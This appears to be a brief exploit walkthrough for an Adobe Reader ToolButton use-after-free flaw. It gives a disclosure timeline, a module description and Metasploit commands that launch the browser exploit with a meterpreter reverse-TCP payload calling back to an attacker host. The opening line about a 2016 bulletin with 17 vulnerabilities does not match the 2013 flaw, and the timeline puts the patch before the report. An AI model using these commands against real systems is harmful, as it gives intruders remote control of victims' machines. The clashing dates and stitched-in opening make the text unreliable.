Adobe has release, the January 12th 2016, during his January Patch Tuesday, one Adobe Acrobat and Reader security bulletin dealing with 17 vulnerabilities. This security bulletin has a Critical severity rating.
Vulnerability discovered by Soroush Dalili and reported to ZDI
Vulnerability reported to the vendor by ZDI the 2013-09-11
Patched by the vendor via APSB13-15 the 2013-08-03
Coordinated public release of advisory by ZDI the 2013-09-11
Vulnerability exploited in the wild in combination with another vulnerability the 2013-11-27
Metasploit PoC provided the 2013-12-16
Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior.
Tested on :
with Adobe Reader 11.0.2 on Windows XP SP3
Description :
This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where the cEnable callback can be used to early free the object memory. Later use of the object allows triggering the use after free condition. This module has been tested successfully on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in November, 2013. At the moment, this module doesn’t support Adobe Reader 9 targets; in order to exploit Adobe Reader 9 the fileformat version of the exploit can be used. This exploit also exist in File format exploit/windows/fileformat/adobe_toolbutton
Commands :
use exploit/windows/browser/adobe_toolbutton
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit
getuid
sysinfo